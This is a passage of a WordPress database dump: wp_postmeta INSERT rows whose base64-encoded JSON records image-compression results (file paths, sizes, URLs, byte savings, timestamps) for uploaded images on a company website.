2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMzYzMjk4NTgtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzM2MzI5ODU4LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMzNjMyOTg1OC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDEyLCJ0aW1lIjoxNDgzNTQ5MTE5LCJpZCI6MjMwM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzM2MzI5ODU4LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMzNjMyOTg1OC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMzYzMjk4NTgtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjUwNiwidGltZSI6MTQ4MzU0OTEyMiwiaWQiOjIzMDN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMzNjMyOTg1OC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMzYzMjk4NTgtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzM2MzI5ODU4LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjo4MzQsInRpbWUiOjE0ODM1NDkxMjcsImlkIjoyMzAzfV0='); 
INSERT INTO `wp_postmeta` VALUES (28854, 2278, 'wpfc_optimisation_reduction', '11097'); 
INSERT INTO `wp_postmeta` VALUES (28855, 2278, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvS3J5dG94LUZBUS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL0tyeXRveC1GQVEuanBnIiwid2lkdGgiOjU2NDgsImhlaWdodCI6Mzc2NSwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU0OTEzMiwiaWQiOiIyMjc4In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9Lcnl0b3gtRkFRLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvS3J5dG94LUZBUS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL0tyeXRveC1GQVEtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjU2NCwidGltZSI6MTQ4MzU0OTEzNSwiaWQiOjIyNzh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvS3J5dG94LUZBUS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL0tyeXRveC1GQVEtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9Lcnl0b3gtRkFRLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxMzg5LCJ0aW1lIjoxNDgzNTQ5MTM5LCJpZCI6MjI3OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9Lcnl0b3gtRkFRLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvS3J5dG94LUZBUS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL0tyeXRveC1GQVEtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEyNTYsInRpbWUiOjE0ODM1NDkxNDMsImlkIjoyMjc4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL0tyeXRveC1GQVEtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvS3J5dG94LUZBUS0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvS3J5dG94LUZBUS0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjo1NTUzLCJ0aW1lIjoxNDgzNTQ5MTQ4LCJpZCI6MjI3OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9Lcnl0b3gtRkFRLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvS3J5dG94LUZBUS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL0tyeXRveC1GQVEtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjUxMCwidGltZSI6MTQ4MzU0OTE1MSwiaWQiOjIyNzh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvS3J5dG94LUZBUS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL0tyeXRveC1GQVEtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9Lcnl0b3gtRkFRLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0MTcsInRpbWUiOjE0ODM1NDkxNTQsImlkIjoyMjc4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL0tyeXRveC1GQVEtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9Lcnl0b3gtRkFRLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvS3J5dG94LUZBUS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NDg4LCJ0aW1lIjoxNDgzNTQ5MTU4LCJpZCI6MjI3OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9Lcnl0b3gtRkFRLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvS3J5dG94LUZBUS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL0tyeXRveC1GQVEtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjkyMCwidGltZSI6MTQ4MzU0OTE2MSwiaWQiOjIyNzh9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (28856, 2243, 'wpfc_optimisation_reduction', '1912'); 
INSERT INTO `wp_postmeta` VALUES (28857, 2243, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvRmx1b3JvZ3VhcmQtZTE0NzU1ODQ0NjE1MzYuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9GbHVvcm9ndWFyZC1lMTQ3NTU4NDQ2MTUzNi5qcGciLCJ3aWR0aCI6NDgwLCJoZWlnaHQiOjE5OCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL0ZsdW9yb2d1YXJkLWUxNDc1NTg0NDYxNTM2LmpwZyIsInJlZHVjdGlvbiI6MTkwOCwidGltZSI6MTQ4MzU0OTE2OCwiaWQiOiIyMjQzIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9GbHVvcm9ndWFyZC1lMTQ3NTU4NDQ2MTUzNi0zNDB4MTk4LmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MTk4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL0ZsdW9yb2d1YXJkLWUxNDc1NTg0NDYxNTM2LTM0MHgxOTguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvRmx1b3JvZ3VhcmQtZTE0NzU1ODQ0NjE1MzYtMzQweDE5OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDkxNzAsImlkIjoyMjQzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL0ZsdW9yb2d1YXJkLWUxNDc1NTg0NDYxNTM2LTI1MHgxOTguanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoxOTgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvRmx1b3JvZ3VhcmQtZTE0NzU1ODQ0NjE1MzYtMjUweDE5OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9GbHVvcm9ndWFyZC1lMTQ3NTU4NDQ2MTUzNi0yNTB4MTk4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0OTE3MiwiaWQiOjIyNDN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvRmx1b3JvZ3VhcmQtZTE0NzU1ODQ0NjE1MzYtMjAweDE5OC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjE5OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9GbHVvcm9ndWFyZC1lMTQ3NTU4NDQ2MTUzNi0yMDB4MTk4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL0ZsdW9yb2d1YXJkLWUxNDc1NTg0NDYxNTM2LTIwMHgxOTguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ5MTc1LCJpZCI6MjI0M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9GbHVvcm9ndWFyZC1lMTQ3NTU4NDQ2MTUzNi0yMjV4MTk4LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MTk4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL0ZsdW9yb2d1YXJkLWUxNDc1NTg0NDYxNTM2LTIyNXgxOTguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvRmx1b3JvZ3VhcmQtZTE0NzU1ODQ0NjE1MzYtMjI1eDE5OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDkxNzcsImlkIjoyMjQzfV0='); 
INSERT INTO `wp_postmeta` VALUES (28858, 2231, 'wpfc_optimisation_reduction', '9303'); 
INSERT INTO `wp_postmeta` VALUES (28859, 2231, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwNjQxNjE2MS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDY0MTYxNjEuanBnIiwid2lkdGgiOjM4NTAsImhlaWdodCI6MjU2NywibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU0OTE4MSwiaWQiOiIyMjMxIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTA2NDE2MTYxLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwNjQxNjE2MS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDY0MTYxNjEtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjcxOCwidGltZSI6MTQ4MzU0OTE4NSwiaWQiOjIyMzF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwNjQxNjE2MS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDY0MTYxNjEtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTA2NDE2MTYxLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxMzE2LCJ0aW1lIjoxNDgzNTQ5MTg5LCJpZCI6MjIzMX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTA2NDE2MTYxLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwNjQxNjE2MS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDY0MTYxNjEtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjExNTQsInRpbWUiOjE0ODM1NDkxOTMsImlkIjoyMjMxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDY0MTYxNjEtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwNjQxNjE2MS0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwNjQxNjE2MS0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjozNDY0LCJ0aW1lIjoxNDgzNTQ5MTk4LCJpZCI6MjIzMX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTA2NDE2MTYxLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwNjQxNjE2MS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDY0MTYxNjEtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjYzMywidGltZSI6MTQ4MzU0OTIwMSwiaWQiOjIyMzF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwNjQxNjE2MS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDY0MTYxNjEtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTA2NDE2MTYxLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0NjQsInRpbWUiOjE0ODM1NDkyMDQsImlkIjoyMjMxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDY0MTYxNjEtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTA2NDE2MTYxLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwNjQxNjE2MS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NTQxLCJ0aW1lIjoxNDgzNTQ5MjA4LCJpZCI6MjIzMX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTA2NDE2MTYxLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwNjQxNjE2MS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDY0MTYxNjEtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEwMTMsInRpbWUiOjE0ODM1NDkyMTEsImlkIjoyMjMxfV0='); 
INSERT INTO `wp_postmeta` VALUES (28860, 2227, 'wpfc_optimisation_reduction', '11162'); 
